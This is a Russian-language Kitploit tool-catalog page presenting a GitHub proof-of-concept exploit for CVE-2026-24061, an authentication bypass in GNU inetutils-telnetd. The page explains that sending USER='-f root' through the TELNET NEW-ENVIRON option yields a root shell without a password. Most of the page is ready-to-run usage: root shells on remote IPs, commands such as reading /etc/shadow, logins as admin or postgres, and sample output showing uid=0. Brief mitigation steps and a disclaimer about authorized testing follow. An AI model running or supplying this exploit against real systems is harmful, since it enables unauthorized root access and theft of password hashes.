Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061 — inetutils-telnetd Обход аутентификации - рабочая версия | Kitploit
Инструменты/GitHubGitHub/balgan/cve-2026-24061
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСетевая безопасностьТестирование на ПроникновениеАутентификация
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd Обход аутентификации - рабочая версия

Репозиторий
37 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24061 — Обход аутентификации в inetutils-telnetd

Эксплойт proof-of-concept для уязвимости обхода аутентификации в GNU inetutils-telnetd.

Обзор

CVE-2026-24061 — это критическая уязвимость обхода аутентификации, затрагивающая inetutils-telnetd версий 1.9.3–2.7. Она позволяет удалённому злоумышленнику получить root-оболочку на уязвимых системах без ввода каких-либо учётных данных.

Детали уязвимости

ПолеЗначение
CVE IDCVE-2026-24061
Затронутое ПОGNU inetutils-telnetd
Затронутые версии1.9.3 – 2.7
Тип уязвимостиОбход аутентификации
Оценка CVSSКритическая
Вектор атакиСеть

Как это работает

Уязвимость использует недостаток в том, как telnetd обрабатывает переменную окружения USER, полученную через опцию TELNET NEW-ENVIRON (RFC 1572) во время согласования протокола.

  1. Согласование протокола TELNET: Когда клиент подключается, сервер и клиент согласовывают возможности, включая опцию NEW-ENVIRON, которая позволяет клиенту отправлять переменные окружения.

  2. Вредоносное значение USER: Эксплойт отправляет USER=-f root в качестве переменной окружения на этапе согласования.

  3. Небезопасная передача аргументов: Уязвимый telnetd передаёт это значение без санитизации программе login.

  4. Инъекция команд: Программа login интерпретирует -f root как флаги командной строки:

    • -f = «принудительный вход без аутентификации»
    • root = имя пользователя, под которым выполняется вход
  5. Доступ root: Злоумышленник получает root-оболочку, так и не получив запроса на ввод пароля.

Суть проблемы

root@kitploit:~
Клиент отправляет:  USER = "-f root"
telnetd выполняет:  login -f root
Результат:          Root-оболочка предоставлена без аутентификации

Это эквивалентно выполнению USER='-f root' telnet -a localhost на системе с уязвимым telnetd.

Требования

  • Python 3.6+
  • Без внешних зависимостей (используется только стандартная библиотека)

Установка

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

Использование

root@kitploit:~
./exploit.py [ОПЦИИ] <цель>

Опции

ОпцияОписаниеПо умолчанию
hostИмя хоста или IP-адрес целиОбязательно
-p, --portПорт цели23
-u, --userВнедряемое значение USER-f root
-c, --commandВыполнить одну команду (неинтерактивно)Нет
-t, --timeoutТайм-аут подключения в секундах10

Примеры

Интерактивная root-оболочка на localhost:

root@kitploit:~
./exploit.py localhost

Интерактивная root-оболочка на удалённом хосте:

root@kitploit:~
./exploit.py 192.168.1.100

Выполнить одну команду и выйти:

root@kitploit:~
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

Вход под другим пользователем:

root@kitploit:~
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

Нестандартный порт:

root@kitploit:~
./exploit.py -p 2323 localhost

Комбинирование опций:

root@kitploit:~
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

Интерактивный режим

При запуске без флага -c эксплойт открывает интерактивную оболочку:

  • Полная поддержка TTY с корректной обработкой терминала
  • Нажмите Ctrl+] для выхода и закрытия соединения
  • Нажмите Ctrl+C для прерывания

Пример вывода

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - Обход аутентификации в inetutils-telnetd   ║
║  Затрагивает: inetutils-telnetd 1.9.3 - 2.7                  ║
╚══════════════════════════════════════════════════════════════╝

[*] Подключение к 192.168.1.100:23
[*] Согласование опций TELNET...
[*] Согласовано NEW-ENVIRON (отправка USER='-f root')
[+] Отправлено USER='-f root' через NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

Смягчение последствий

Немедленные действия

  1. Отключите telnetd: Если он не является строго необходимым, полностью отключите службу telnet

    root@kitploit:~
    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. Используйте SSH вместо telnet: Замените telnet на SSH для удалённого доступа

    root@kitploit:~
    sudo apt install openssh-server
    
  3. Правила межсетевого экрана: Заблокируйте порт 23 для ненадёжных сетей

    root@kitploit:~
    sudo ufw deny 23/tcp
    

Долгосрочное исправление

  • Обновитесь до исправленной версии inetutils, когда она станет доступна
  • Следите за рекомендациями вендора по исправлениям безопасности

Технические детали

Эксплойт реализует минимальный TELNET-клиент, который:

  1. Устанавливает TCP-соединение с целью
  2. Отвечает на согласование опций TELNET (DO/DONT/WILL/WONT)
  3. Когда сервер запрашивает переменные окружения через NEW-ENVIRON:
    • Отправляет USER=-f root в ответе ENV_IS
  4. Обрабатывает согласование типа терминала (TTYPE) и размера окна (NAWS)
  5. Предоставляет интерактивный режим или режим выполнения команд

Соответствующие RFC

  • RFC 854 — Спецификация протокола TELNET
  • RFC 1572 — Опция окружения TELNET

Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

  • Используйте этот эксплойт только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение
  • Несанкционированный доступ к компьютерным системам незаконен в большинстве юрисдикций
  • Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом

Лицензия

Лицензия MIT — Подробности см. в LICENSE.

Ссылки

  • Детали CVE-2026-24061
  • GNU inetutils
  • Протокол TELNET RFC 854
Скачать инструмент